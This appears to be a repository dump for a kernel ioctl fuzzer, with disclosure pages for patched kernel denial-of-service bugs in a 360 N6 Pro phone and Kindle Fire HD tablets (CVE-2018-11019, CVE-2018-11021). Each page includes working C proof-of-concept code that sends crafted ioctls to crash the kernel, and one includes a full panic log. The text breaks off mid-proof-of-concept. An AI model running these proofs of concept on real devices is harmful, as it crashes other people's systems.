├── 360 Phone N6 Pro Kernel Vuln.md ├── CVE-2018-11019.md ├── CVE-2018-11020.md ├── CVE-2018-11021.md ├── CVE-2018-11022.md ├── CVE-2018-11025.md ├── CVE-Advisory.md ├── CVEs.md ├── DriverDevices ├── honor8_device_ioctl.txt ├── kindle7_device_ioctl.txt └── mate9_device_ioctl.txt ├── LICENSE ├── MangoFuzz ├── LICENSE ├── dev_runner.py ├── executor │ ├── a.out │ └── executor.c ├── fuzzer │ ├── __init__.py │ ├── blenders │ │ ├── __init__.py │ │ ├── blender.py │ │ ├── blob_blender.py │ │ ├── num_blender.py │ │ └── string_blender.py │ ├── engine.py │ ├── juicers │ │ ├── __init__.py │ │ ├── globs.py │ │ ├── hexify_juicer.py │ │ ├── juicer.py │ │ └── tcp_juicer.py │ ├── mango_config.py │ ├── mango_types │ │ ├── __init__.py │ │ ├── block.py │ │ ├── choice.py │ │ ├── data_guys.py │ │ ├── jpit.py │ │ ├── mapping.py │ │ ├── my_types.py │ │ ├── number.py │ │ ├── pointer.py │ │ └── strings.py │ ├── parse.py │ └── utils │ │ ├── __init__.py │ │ └── peelers.py └── runner.py ├── README.md ├── cparser.py ├── gdbioctl.py ├── mi.py ├── post_processing ├── LICENSE ├── c2xml ├── generics │ ├── generic_arr.xml │ ├── generic_i16.xml │ ├── generic_i32.xml │ └── generic_i64.xml ├── parse.py ├── post_parse.py ├── pre_parse.py └── run_all.py └── utils.py /360 Phone N6 Pro Kernel Vuln.md: -------------------------------------------------------------------------------- 1 | # 360 Phone N6 Pro Kernel Vuln 2 | These page show the details of the vulnerability found in 360 Phone N6 Pro. I reported these bugs to src@alarm.360.cn on On 5/4/2018 and now I have been told they have repaired the bugs and the details can be published. However, Qiku Tec. does not have an advisory page for phone products at the moment. I think it is a must to list the detailed infomation here. 3 | 4 | ## Time Line 5 | * 5/4/2018 Bugs were reported to src@alarm.360.cn. 6 | * 5/14/2018 Qiku Tec. got confirmation that the bug could cause kernel crash. 7 | * 07/14/2018 Qiku Tec. had started updating 360 N6 Pro with the security patches. 8 | 9 | ### Abstract 10 | 11 | * Name: 360 Phone N6 Pro 12 | * Model: 1801-A01 13 | * Date: 2018-10-15 14 | * Reporter: Shuaibing Lu, Liang Ming 15 | * Vendor: http://www.qiku.com/product/n6p/index.html 16 | * Product Link: http://www.qiku.com/product/n6p/index.html 17 | * Android Version: 7.1.1 18 | * Version Number: V096 19 | * Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64 20 | 21 | ### Description 22 | 23 | Kernel module in the kernel component of 360 Phone N6 Pro V096 allows attackers to inject a crafted argument via the argument of an ioctl on device /dev/block/mmcblk0rpmb with the command **3235427072** and cause a kernel crash. 24 | 25 | ### POC 26 | 27 | ``` 28 | /* 29 | * This is poc of 360 N6 Pro, 1801-A01 30 | * Android Version: 7.1.1 31 | * Version Number: V096 32 | * Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64 33 | * A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072. 34 | * This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb. 35 | */ 36 | #include 37 | #include 38 | #include 39 | #include 40 | 41 | const static char *driver = "/dev/block/mmcblk0rpmb"; 42 | static command = 3235427072; // 0xc0d8b300 43 | 44 | int main(int argc, char **argv, char **env) { 45 | int fd = 0; 46 | fd = open(driver, O_RDWR); 47 | if (fd < 0) { 48 | printf("Failed to open %s, with errno %dn", driver, errno); 49 | system("echo 1 > /data/local/tmp/log"); 50 | return -1; 51 | } 52 | 53 | printf("Try ioctl device file '%s', with command 0x%x and payload NULLn", driver, command); 54 | printf("System will crash and reboot.n"); 55 | if(ioctl(fd, command, NULL) < 0) { 56 | printf("Allocation of structs failed, %dn", errno); 57 | system("echo 2 > /data/local/tmp/log"); 58 | return -1; 59 | } 60 | close(fd); 61 | return 0; 62 | } 63 | ``` 64 | ### References 65 | [360 Phone N6 pro](http://www.qiku.com/product/n6p/index.html) 66 | -------------------------------------------------------------------------------- /CVE-2018-11019.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-11019 2 | These page show one of the practical CVEs that Found. I reported these bugs to Security@amazon.com on On 5/11/2018 and now I have been told they have repaired the bugs and the details can be published. However, Amazon does not have an advisory page at the moment. I think it is a must to list the detailed infomation here. 3 | ## Time Line 4 | * 5/11/2018 Bugs were reported to Security@amazon.com. 5 | * 06/27/2018 Amazon got confirmation that CVE-2018-11019 could cause kernel crash. 6 | * 09/18/2018 Amazon had started updating our FireOS 4 devices with the security patches. 7 | 8 | 9 | ## CVE-2018-11019 10 | ### Abstract 11 | 12 | * Name: Amazon Kindle Fire HD (3rd Generation) Kernel DoS 13 | * Date: 2018-10-10 14 | * Reporter: Shuaibing Lu, Liang Ming 15 | * Vendor: http://www.amazon.com/ 16 | * Software Link: https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2 17 | * Version: Fire OS 4.5.5.3 18 | ### Description 19 | 20 | Kernel module /omap/drivers/misc/gcx/gcioctl/gcif.c in the kernel component in Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3 allows attackers to inject a crafted argument via the argument of an ioctl on device /dev/gcioctl with the command **3221773726** and cause a kernel crash. 21 | 22 | ### PoC 23 | ``` 24 | /* 25 | * This is poc of Kindle Fire HD 3rd 26 | * A bug in the ioctl interface of device file /dev/gcioctl causes the system crash via IOCTL 3221773726. 27 | * This Poc should run with permission to do ioctl on /dev/gcioctl. The read permission of /dev/gcioctl is granted to a normal app in default on Fire OS. 28 | * 29 | */ 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | const static char *driver = "/dev/gcioctl"; 36 | static command = 3221773726; 37 | 38 | struct load_weight { 39 | unsigned long weight, inv_weight; 40 | }; 41 | 42 | int main(int argc, char **argv, char **env) { 43 | struct load_weight payload; 44 | payload.weight = 0; 45 | payload.inv_weight =0; 46 | 47 | payload.weight |= 0x00000000ffffffff; 48 | payload.inv_weight |= 0x000000000000000f; 49 | 50 | int fd = 0; 51 | fd = open(driver, O_RDWR); 52 | if (fd < 0) { 53 | printf("Failed to open %s, with errno %d\n", driver, errno); 54 | system("echo 1 > /data/local/tmp/log"); 55 | return -1; 56 | } 57 | 58 | printf("Try open %s with command 0x%x.\n", driver, command); 59 | printf("System will crash and reboot.\n"); 60 | if(ioctl(fd, command, &payload) < 0) { 61 | printf("Allocation of structs failed, %d\n", errno); 62 | system("echo 2 > /data/local/tmp/log"); 63 | return -1; 64 | } 65 | close(fd); 66 | return 0; 67 | } 68 | 69 | ``` 70 | ### References 71 | 72 | MITRE Orgnazation: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11019 73 | 74 | Kindle Kernel Sources:https://www.amazon.com/gp/help/customer/display.html?nodeId=200203720 75 | 76 | Kindle kernel (version 4.5.5.3 for kindle fire hdx 3rd): 77 | 78 | ### Crash Log 79 | 80 | ``` 81 | [ 164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037 82 | [ 164.802459] pgd = c26ec000 83 | [ 164.805664] [00000037] *pgd=82f42831, *pte=00000000, *ppte=00000000 84 | [ 164.813415] Internal error: Oops: 17 [#1] PREEMPT SMP ARM 85 | [ 164.819458] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O) 86 | [ 164.827239] CPU: 1 Tainted: G O (3.4.83-gd2afc0bae69 #1) 87 | [ 164.834686] PC is at dev_ioctl+0x4ac/0x10c4 88 | [ 164.839416] LR is at down_timeout+0x40/0x5c 89 | [ 164.844146] pc : [] lr : [] psr: 60000013 90 | [ 164.844146] sp : c25a1e70 ip : c25a1e50 fp : c25a1f04 91 | [ 164.857116] r10: 00000000 r9 : d8c0aca8 r8 : bed5c610 92 | [ 164.863128] r7 : c0a25b50 r6 : c25a0000 r5 : bed5c610 r4 : 0000000f 93 | [ 164.870391] r3 : 00001403 r2 : 00000000 r1 : 20000013 r0 : 00000000 94 | [ 164.877807] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user 95 | [ 164.885894] Control: 10c5387d Table: 826ec04a DAC: 00000015 96 | [ 164.892303] 97 | [ 164.892333] PC: 0xc0317868: 98 | [ 164.897308] 7868 30d22003 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f 99 | [ 164.907989] 7888 e3c6603f e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064 100 | [ 164.918670] 78a8 e1a01005 e3a02008 e50b3088 e1a00003 ebfcfa5f e3500000 1a00001e e51b4060 101 | [ 164.929351] 78c8 e3020710 e59f7bdc ebf4db32 e1a01000 e2870038 ebf55c25 e3500000 1a0002e0 102 | [ 164.939880] 78e8 e5943028 e1a08000 e5940024 e1a02007 e2841024 e5803004 e5830000 e5b23070 103 | [ 164.950561] 7908 e5871070 e2420038 e5831004 e5843024 e5842028 ebf55bb9 e50b8060 e50b8064 104 | [ 164.961212] 7928 ea000006 e24b1064 e50b1088 e51b0088 e3a01008 ebfd0387 e3a03004 e50b3064 105 | [ 164.971771] 7948 e5963008 e2952008 30d22003 33a03000 e3530000 1affffc5 e1a00005 e51b1088 106 | [ 164.982299] 107 | [ 164.982330] LR: 0xc006e938: 108 | [ 164.987426] e938 e1a01000 0a000007 e3a05000 e2433001 e5843008 e1a00004 eb18d7ad e1a00005 109 | [ 164.997955] e958 e24bd014 e89da830 e1a00004 e50b1018 eb18d135 e51b1018 e1a05000 eafffff4 110 | [ 165.008636] e978 e1a0c00d e92dd878 e24cb004 e1a04000 e1a05001 eb18d91b e5943008 e3530000 111 | [ 165.019317] e998 e1a06000 0a000007 e3a05000 e2433001 e5843008 e1a00004 e1a01006 eb18d794 112 | [ 165.029846] e9b8 e1a00005 e89da878 e1a01005 e1a00004 eb18d158 e1a05000 eafffff5 e1a0c00d 113 | [ 165.040374] e9d8 e92dd800 e24cb004 e5903000 e1a0c000 e3530000 0a00000b e5910008 e5932008 114 | [ 165.051055] e9f8 e1500002 da000003 ea000006 e5932008 e1520000 ba000003 e283c004 e5933004 115 | [ 165.061737] ea18 e3530000 1afffff8 e5813004 f57ff05f e3a00000 e58c1000 e89da800 e1a0c00d 116 | [ 165.072265] 117 | [ 165.072265] SP: 0xc25a1df0: 118 | [ 165.077362] 1df0 00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff 119 | [ 165.087890] 1e10 c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013 120 | [ 165.098419] 1e30 00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8 121 | [ 165.109100] 1e50 00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff 122 | [ 165.119781] 1e70 00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920 123 | [ 165.130340] 1e90 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff 124 | [ 165.141021] 1eb0 00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580 125 | [ 165.151702] 1ed0 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40 00000004 c719ab40 bed5c610 126 | [ 165.162353] 127 | [ 165.162384] IP: 0xc25a1dd0: 128 | [ 165.167327] 1dd0 c0070df8 c00795ac c25a0000 00000001 00000004 d454d0f4 60000013 00000001 129 | [ 165.178009] 1df0 00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff 130 | [ 165.188537] 1e10 c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013 131 | [ 165.199249] 1e30 00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8 132 | [ 165.209899] 1e50 00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff 133 | [ 165.220581] 1e70 00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920 134 | [ 165.231109] 1e90 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff 135 | [ 165.241790] 1eb0 00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580 136 | [ 165.252441] 137 | [ 165.252441] FP: 0xc25a1e84: 138 | [ 165.257415] 1e84 c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 139 | [ 165.268066] 1ea4 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14 00000000 140 | [ 165.278717] 1ec4 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40 141 | [ 165.289276] 1ee4 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08 c0136044 142 | [ 165.299926] 1f04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440 143 | [ 165.310607] 1f24 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004 c25a0000 144 | [ 165.321136] 1f44 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004 c25a0000 145 | [ 165.331695] 1f64 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000 00000400 146 | [ 165.342346] 147 | [ 165.342376] R6: 0xc259ff80: 148 | [ 165.347320] ff80 00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000 149 | [ 165.358001] ffa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 150 | [ 165.368682] ffc0 00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000 151 | [ 165.379241] ffe0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 152 | [ 165.389770] 0000 00000000 00000002 00000000 d72b0980 c0a0e840 00000001 00000015 c265dc00 153 | [ 165.400451] 0020 00000000 c25a0000 c09ddc50 d72b0980 de949300 c1620b40 c25a1b7c c25a1ac8 154 | [ 165.411132] 0040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000 155 | [ 165.421661] 0060 005634c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000 156 | [ 165.432342] 157 | [ 165.432342] R7: 0xc0a25ad0: 158 | [ 165.437316] 5ad0 00010105 01010005 01040901 00040001 ffff0101 00000000 00000000 00040b03 159 | [ 165.447875] 5af0 01040101 ffff0100 00000000 00000000 0000ffff 00000000 0e0c0000 01010005 160 | [ 165.458526] 5b10 01000105 0000ffff 00000000 0e0c0000 01010005 00000105 01040901 00040001 161 | [ 165.469207] 5b30 ffff0101 00000000 00000000 00040b03 01040101 3f3f0100 00010001 01000001 162 | [ 165.479736] 5b50 00000000 00000000 00000001 c0a25b5c c0a25b5c c0a25b64 c0a25b64 00000000 163 | [ 165.490417] 5b70 00000000 00000001 c0a25b78 c0a25b78 c0a25b80 c0a25b80 00000000 00000000 164 | [ 165.500946] 5b90 00000000 c0a25b94 c0a25b94 c0a25b9c c0a25b9c 00000000 00000000 00000001 165 | [ 165.511627] 5bb0 c0a25bb0 c0a25bb0 c0a25bb8 c0a25bb8 c0a25bc0 c0a25bc0 c0a25bc8 c0a25bc8 166 | [ 165.522186] 167 | [ 165.522186] R9: 0xd8c0ac28: 168 | [ 165.527282] ac28 d8c0ac28 d8c0ac28 00000000 00000000 00000000 c06bc674 000200da c09dda58 169 | [ 165.537841] ac48 00000000 00000000 d8c0ac50 d8c0ac50 00000000 c0aa5174 c0aa5174 c0aa5148 170 | [ 165.548492] ac68 5aefbbda 00000000 00000000 00000000 d8c0ac80 00000000 00000000 00000000 171 | [ 165.559020] ac88 00200000 00000000 00000000 d8c0ac94 d8c0ac94 dd3f6080 dd3f6080 00000000 172 | [ 165.569702] aca8 000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400 173 | [ 165.580261] acc8 d8c0ad80 dd3ede70 00001064 00000001 0fb00000 5aefbbda 2e19b832 5aefbbda 174 | [ 165.590911] ace8 2e19b832 5aefbbda 2e19b832 00000000 00000000 00000000 00000000 00000000 175 | [ 165.601593] ad08 00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0ad24 176 | [ 165.612121] Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8) 177 | [ 165.619445] Stack: (0xc25a1e70 to 0xc25a2000) 178 | [ 165.624359] 1e60: 00000001 00000028 000fffff c25a1ea0 179 | [ 165.633605] 1e80: c25a1edc c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8 180 | [ 165.642822] 1ea0: ffffffff 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14 181 | [ 165.652038] 1ec0: 00000000 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000 182 | [ 165.661102] 1ee0: c719ab40 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08 183 | [ 165.670318] 1f00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 184 | [ 165.679565] 1f20: dcf8c440 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004 185 | [ 165.688781] 1f40: c25a0000 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004 186 | [ 165.697875] 1f60: c25a0000 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000 187 | [ 165.707092] 1f80: 00000400 bed5c638 00010e64 00000000 00000036 c0013e08 00000000 c25a1fa8 188 | [ 165.716308] 1fa0: c0013c60 c0136578 bed5c638 00010e64 00000004 c0085d9e bed5c610 bed5c610 189 | [ 165.725402] 1fc0: bed5c638 00010e64 00000000 00000036 00000000 00000000 00000000 bed5c624 190 | [ 165.734619] 1fe0: 00000000 bed5c5f4 000106a4 0002918c 60000010 00000004 00000000 00000000 191 | [ 165.743835] Backtrace: 192 | [ 165.746856] [] (dev_ioctl+0x0/0x10c4) from [] (do_vfs_ioctl+0x8c/0x5b4) 193 | [ 165.756256] [] (do_vfs_ioctl+0x0/0x5b4) from [] (sys_ioctl+0x74/0x84) 194 | [ 165.765502] [] (sys_ioctl+0x0/0x84) from [] (ret_fast_syscall+0x0/0x30) 195 | [ 165.774780] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e64 r4:bed5c638 196 | [ 165.783203] Code: e2870038 ebf55c25 e3500000 1a0002e0 (e5943028) 197 | [ 165.793060] Board Information: 198 | [ 165.793060] Revision : 0001 199 | [ 165.793060] Serial : 0000000000000000 200 | [ 165.793090] SoC Information: 201 | [ 165.793090] CPU : OMAP4470 202 | [ 165.793090] Rev : ES1.0 203 | [ 165.793121] Type : HS 204 | [ 165.793121] Production ID: 0002B975-000000CC 205 | [ 165.793121] Die ID : 1CC60000-50002FFF-0B00935D-11007004 206 | [ 165.793121] 207 | [ 165.844757] ---[ end trace aba846a2af6e75b7 ]--- 208 | [ 165.850097] Kernel panic - not syncing: Fatal exception 209 | [ 165.856109] CPU0: stopping 210 | [ 165.859252] Backtrace: 211 | [ 165.862274] [] (dump_backtrace+0x0/0x10c) from [] (dump_stack+0x18/0x1c) 212 | [ 165.871643] r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950 213 | [ 165.878784] [] (dump_stack+0x0/0x1c) from [] (handle_IPI+0x190/0x1c4) 214 | [ 165.887908] [] (handle_IPI+0x0/0x1c4) from [] (gic_handle_irq+0x58/0x60) 215 | [ 165.897399] [] (gic_handle_irq+0x0/0x60) from [] (__irq_svc+0x40/0x70) 216 | [ 165.906707] Exception stack(0xd8dcfc38 to 0xd8dcfc80) 217 | [ 165.912384] fc20: c153a9f8 00000000 218 | [ 165.921600] fc40: 00000002 c153aa08 00000007 c153a9f8 d8d72210 b6eaf010 d8caee34 bab7375f 219 | [ 165.930816] fc60: 00000001 d8dcfcac 0009eded d8dcfc80 c010a5b4 c010a5fc 20070013 ffffffff 220 | [ 165.940032] r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4 221 | [ 165.947052] [] (follow_page+0x0/0x238) from [] (__get_user_pages+0x13c/0x3f0) 222 | [ 165.957031] [] (__get_user_pages+0x0/0x3f0) from [] (get_user_pages+0x50/0x58) 223 | [ 165.967102] [] (get_user_pages+0x0/0x58) from [] (get_user_pages_fast+0x64/0x7c) 224 | [ 165.977233] r4:d8caee3c 225 | [ 165.980468] [] (get_user_pages_fast+0x0/0x7c) from [] (fuse_copy_fill+0x1bc/0x238) 226 | [ 165.990905] [] (fuse_copy_fill+0x0/0x238) from [] (fuse_copy_one+0x38/0x68) 227 | [ 166.000579] r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000 228 | [ 166.007690] [] (fuse_copy_one+0x0/0x68) from [] (fuse_dev_do_read+0x3e4/0x69c) 229 | [ 166.017761] r4:dd243c00 230 | [ 166.020874] [] (fuse_dev_do_read+0x0/0x69c) from [] (fuse_dev_read+0x84/0x9c) 231 | [ 166.030853] [] (fuse_dev_read+0x0/0x9c) from [] (do_sync_read+0xb0/0xf0) 232 | [ 166.040222] r7:00000000 r6:00000000 r5:00000000 r4:00000000 233 | [ 166.047363] [] (do_sync_read+0x0/0xf0) from [] (vfs_read+0xa4/0x148) 234 | [ 166.056488] [] (vfs_read+0x0/0x148) from [] (sys_read+0x40/0x78) 235 | [ 166.065093] r8:00040050 r7:b6eaf010 r6:d8e08900 r5:00000000 r4:00000000 236 | [ 166.073547] [] (sys_read+0x0/0x78) from [] (ret_fast_syscall+0x0/0x30) 237 | [ 166.082855] r8:c0013e08 r7:00000003 r6:b6eaf008 r5:b73828a0 r4:b6eaf010 238 | [ 166.091217] CPU0 PC (0) : 0xc0019b2c 239 | [ 166.095397] CPU0 PC (1) : 0xc0019b2c 240 | [ 166.099456] CPU0 PC (2) : 0xc0019b2c 241 | [ 166.103515] CPU0 PC (3) : 0xc0019b2c 242 | [ 166.107574] CPU0 PC (4) : 0xc0019b2c 243 | [ 166.111785] CPU0 PC (5) : 0xc0019b2c 244 | [ 166.115814] CPU0 PC (6) : 0xc0019b2c 245 | [ 166.119873] CPU0 PC (7) : 0xc0019b2c 246 | [ 166.124084] CPU0 PC (8) : 0xc0019b2c 247 | [ 166.128112] CPU0 PC (9) : 0xc0019b2c 248 | [ 166.132171] CPU1 PC (0) : 0xc003ee38 249 | [ 166.136352] CPU1 PC (1) : 0xc003ee54 250 | [ 166.140411] CPU1 PC (2) : 0xc003ee54 251 | [ 166.144470] CPU1 PC (3) : 0xc003ee54 252 | [ 166.148681] CPU1 PC (4) : 0xc003ee54 253 | [ 166.152709] CPU1 PC (5) : 0xc003ee54 254 | [ 166.156768] CPU1 PC (6) : 0xc003ee54 255 | [ 166.160980] CPU1 PC (7) : 0xc003ee54 256 | [ 166.165008] CPU1 PC (8) : 0xc003ee54 257 | [ 166.169067] CPU1 PC (9) : 0xc003ee54 258 | [ 166.173126] 259 | [ 166.175048] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017 260 | [ 166.175079] 261 | 262 | 263 | ``` 264 | -------------------------------------------------------------------------------- /CVE-2018-11021.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-11021 2 | These page show one of the practical CVEs that Found. I reported these bugs to Security@amazon.com on On 5/11/2018 and now I have been told they have repaired the bugs and the details can be published. However, Amazon does not have an advisory page at the moment. I think it is a must to list the detailed infomation here. 3 | ## Time Line 4 | * 5/11/2018 Bugs were reported to Security@amazon.com. 5 | * 06/27/2018 Amazon got confirmation that CVE-2018-11021 could cause kernel crash. 6 | * 09/18/2018 Amazon had started updating our FireOS 4 devices with the security patches. 7 | 8 | 9 | ## CVE-2018-11021 10 | ### Abstract 11 | 12 | * Name: Amazon Kindle Fire HD (3rd Generation) Kernel DoS 13 | * Date: 2018-10-10 14 | * Reporter: Shuaibing Lu, Liang Ming 15 | * Vendor: http://www.amazon.com/ 16 | * Software Link: https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2 17 | * Version: Fire OS 4.5.5.3 18 | ### Description 19 | 20 | Kernel module /omap/drivers/video/omap2/dsscomp/device.c in the kernel component in Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3 allows attackers to inject a crafted argument via the argument of an ioctl on device /dev/dsscomp with the command **1118064517** and cause a kernel crash. 21 | 22 | To explore this vulnerability, some one must open the device file /dev/dsscomp, call an ioctl system call on this device file with the command **1118064517** and a crafted payload as the third argument. 23 | 24 | ### PoC 25 | ``` 26 | /* 27 | * This is poc of Kindle Fire HD 3rd 28 | * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517. 29 | * Related buggy struct name is dsscomp_setup_dispc_data. 30 | * This Poc should run with permission to do ioctl on /dev/dsscomp. 31 | * 32 | */ 33 | #include 34 | #include 35 | #include 36 | #include 37 | 38 | const static char *driver = "/dev/dsscomp"; 39 | static command = 1118064517; 40 | 41 | int main(int argc, char **argv, char **env) { 42 | unsigned int payload[] = { 43 | 0xffffffff, 44 | 0x00000003, 45 | 0x5d200040, 46 | 0x79900008, 47 | 0x8f5928bd, 48 | 0x78b02422, 49 | 0x00000000, 50 | 0xffffffff, 51 | 0xf4c50400, 52 | 0x007fffff, 53 | 0x8499f562, 54 | 0xffff0400, 55 | 0x001b131d, 56 | 0x60818210, 57 | 0x00000007, 58 | 0xffffffff, 59 | 0x00000000, 60 | 0x9da9041c, 61 | 0xcd980400, 62 | 0x001f03f4, 63 | 0x00000007, 64 | 0x2a34003f, 65 | 0x7c80d8f3, 66 | 0x63102627, 67 | 0xc73643a8, 68 | 0xa28f0665, 69 | 0x00000000, 70 | 0x689e57b4, 71 | 0x01ff0008, 72 | 0x5e7324b1, 73 | 0xae3b003f, 74 | 0x0b174d86, 75 | 0x00000400, 76 | 0x21ffff37, 77 | 0xceb367a4, 78 | 0x00000040, 79 | 0x00000001, 80 | 0xec000f9e, 81 | 0x00000001, 82 | 0x000001ff, 83 | 0x00000000, 84 | 0x00000000, 85 | 0x0000000f, 86 | 0x0425c069, 87 | 0x038cc3be, 88 | 0x0000000f, 89 | 0x00000080, 90 | 0xe5790100, 91 | 0x5b1bffff, 92 | 0x0000d355, 93 | 0x0000c685, 94 | 0xa0070000, 95 | 0x0010ffff, 96 | 0x00a0ff00, 97 | 0x00000001, 98 | 0xff490700, 99 | 0x0832ad03, 100 | 0x00000006, 101 | 0x00000002, 102 | 0x00000001, 103 | 0x81f871c0, 104 | 0x738019cb, 105 | 0xbf47ffff, 106 | 0x00000040, 107 | 0x00000001, 108 | 0x7f190f33, 109 | 0x00000001, 110 | 0x8295769b, 111 | 0x0000003f, 112 | 0x869f2295, 113 | 0xffffffff, 114 | 0xd673914f, 115 | 0x05055800, 116 | 0xed69b7d5, 117 | 0x00000000, 118 | 0x0107ebbd, 119 | 0xd214af8d, 120 | 0xffff4a93, 121 | 0x26450008, 122 | 0x58df0000, 123 | 0xd16db084, 124 | 0x03ff30dd, 125 | 0x00000001, 126 | 0x209aff3b, 127 | 0xe7850800, 128 | 0x00000002, 129 | 0x30da815c, 130 | 0x426f5105, 131 | 0x0de109d7, 132 | 0x2c1a65fc, 133 | 0xfcb3d75f, 134 | 0x00000000, 135 | 0x00000001, 136 | 0x8066be5b, 137 | 0x00000002, 138 | 0xffffffff, 139 | 0x5cf232ec, 140 | 0x680d1469, 141 | 0x00000001, 142 | 0x00000020, 143 | 0xffffffff, 144 | 0x00000400, 145 | 0xd1d12be8, 146 | 0x02010200, 147 | 0x01ffc16f, 148 | 0xf6e237e6, 149 | 0x007f0000, 150 | 0x01ff08f8, 151 | 0x000f00f9, 152 | 0xbad07695, 153 | 0x00000000, 154 | 0xbaff0000, 155 | 0x24040040, 156 | 0x00000006, 157 | 0x00000004, 158 | 0x00000000, 159 | 0xbc2e9242, 160 | 0x009f5f08, 161 | 0x00800000, 162 | 0x00000000, 163 | 0x00000001, 164 | 0xff8800ff, 165 | 0x00000001, 166 | 0x00000000, 167 | 0x000003f4, 168 | 0x6faa8472, 169 | 0x00000400, 170 | 0xec857dd5, 171 | 0x00000000, 172 | 0x00000040, 173 | 0xffffffff, 174 | 0x3f004874, 175 | 0x0000b77a, 176 | 0xec9acb95, 177 | 0xfacc0001, 178 | 0xffff0001, 179 | 0x0080ffff, 180 | 0x3600ff03, 181 | 0x00000001, 182 | 0x8fff7d7f, 183 | 0x6b87075a, 184 | 0x00000000, 185 | 0x41414141, 186 | 0x41414141, 187 | 0x41414141, 188 | 0x41414141, 189 | 0x001001ff, 190 | 0x00000000, 191 | 0x00000001, 192 | 0xff1f0512, 193 | 0x00000001, 194 | 0x51e32167, 195 | 0xc18c55cc, 196 | 0x00000000, 197 | 0xffffffff, 198 | 0xb4aaf12b, 199 | 0x86edfdbd, 200 | 0x00000010, 201 | 0x0000003f, 202 | 0xabff7b00, 203 | 0xffff9ea3, 204 | 0xb28e0040, 205 | 0x000fffff, 206 | 0x458603f4, 207 | 0xffff007f, 208 | 0xa9030f02, 209 | 0x00000001, 210 | 0x002cffff, 211 | 0x9e00cdff, 212 | 0x00000004, 213 | 0x41414141, 214 | 0x41414141, 215 | 0x41414141, 216 | 0x41414141 }; 217 | 218 | int fd = 0; 219 | fd = open(driver, O_RDWR); 220 | if (fd < 0) { 221 | printf("Failed to open %s, with errno %d\n", driver, errno); 222 | system("echo 1 > /data/local/tmp/log"); 223 | return -1; 224 | } 225 | 